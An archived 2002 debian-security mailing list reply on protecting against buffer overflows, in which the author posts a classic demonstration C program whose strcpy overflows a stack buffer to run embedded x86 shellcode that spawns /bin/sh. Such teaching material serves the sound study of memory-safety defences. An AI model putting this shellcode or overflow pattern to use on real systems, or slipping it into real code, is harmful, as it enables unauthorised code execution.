Re: protection against buffer overflows

To: debian-security@lists.debian.org
Cc: Steve Johnson <steve@webninja.com>
Subject: Re: protection against buffer overflows
From: Vincent <glaume@enseirb.fr>
Date: Thu, 24 Jan 2002 00:43:41 +0100
Message-id: <[🔎] 20020123234341.GF22597@sothis.glaume.mds>
Reply-to: glaume@enseirb.fr
In-reply-to: <[🔎] 1011825803.9612.4.camel@monkey>
References: <[🔎] 675596326AC6D5119F5600A024CC1851102B26@MAIL2> <[🔎] 1011775527.603.2.camel@isidor> <[🔎] 1011825803.9612.4.camel@monkey>

Here is a simple example with shellcode. It will give you a nice shell if
there's a /bin/sh on your system :
--------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

int main(int ac, char *av[])
{
char buffer[96];
int i;
long *long_ptr = (long *) large_string;

for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;
for (i = 0; i < (int)
   strlen(shellcode); i++)
   large_string[i] = shellcode[i];
   
strcpy(buffer, large_string);
return 0;
}
--------------------------------------------------------------------------

The Alep1 article mentioned before here is an excellent reference.
If you understand French, have a look at http://www.cgsecurity.org/ , buffer
overflow section.

Vincent

Reply to:

References:
- RE: protection against buffer overflows
  - From: "Hassard, Stephen" <SHassard@angio.com>
- RE: protection against buffer overflows
  - From: Lars Bahner <lars@bahner.com>
- RE: protection against buffer overflows
  - From: Steve Johnson <steve@webninja.com>

Prev by Date: Re: protection against buffer overflows
Next by Date: Re: SOME ITEMS THAT YOU MAY BE INTERESTED IN OR BE ABLE TO ADVISE ME ON
Previous by thread: Re: protection against buffer overflows
Next by thread: su - user question
Index(es):
- Date
- Thread